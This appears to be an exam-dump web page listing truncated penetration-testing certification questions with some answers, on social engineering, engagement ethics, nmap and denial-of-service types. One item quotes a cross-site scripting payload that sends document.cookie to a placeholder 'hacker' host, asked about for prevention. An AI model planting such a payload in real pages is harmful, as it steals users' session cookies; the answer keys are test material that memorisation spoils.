- All Exams Instant Download
In which of the following places should the penetration tester look FIRST for the employees’ numbers?
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees’ phone numbers on the company’s website, the tester has learned the complete phone catalog was published there a few months ago. In which of the following places should...
Based on the information in the SOW, which of the following behaviors would be considered unethical?
A penetration tester is reviewing the following SOW prior to engaging with a client: “Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO)...
Which of the following would be the BEST command to use for further progress into the targeted network?
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine: Which of the following would be the BEST command to use...
Which of the following changes should the tester apply to make the script work as intended?
A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly. Which of the following changes should the tester apply to make the script work as intended?A . Change line 2 to $ip= 10.192.168.254; B. Remove...
Which of the following would a company's hunt team be MOST interested in seeing in a final report?
Which of the following would a company's hunt team be MOST interested in seeing in a final report?A . Executive summary B. Attack TTPs C. Methodology D. Scope detailsView AnswerAnswer: B
Which of the following are the BEST methods to prevent against this type of attack?
Given the following code: <SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SC RIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)A . Web-application firewall B. Parameterized queries C. Output encoding D. Session tokens E. Input validation F. Base64 encodingView AnswerAnswer: C,E Explanation: Encoding (commonly called “Output Encoding”) involves...
Which of the following methodologies should be used to BEST meet the client's expectations?
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client's expectations?A . OWASP Top 10 B. MITRE ATT&CK framework C....
CORRECT TEXT
CORRECT TEXT SIMULATION Using the output, identify potential attack vectors that should be further investigated. View AnswerAnswer: 1: Null session enumeration Weak SMB file permissions Fragmentation attack 2: nmap -sV -p 1-1023
Which of the following could be used for a denial-of-service attack on the network segment?
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?A . Smurf B. Ping flood C. Fraggle D. Ping of deathView AnswerAnswer: C Explanation: Fraggle attack is...
Which of the following would BEST support this task?
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?A . Run nmap with the Co, -p22, and CsC options set against the target B. Run nmap with...
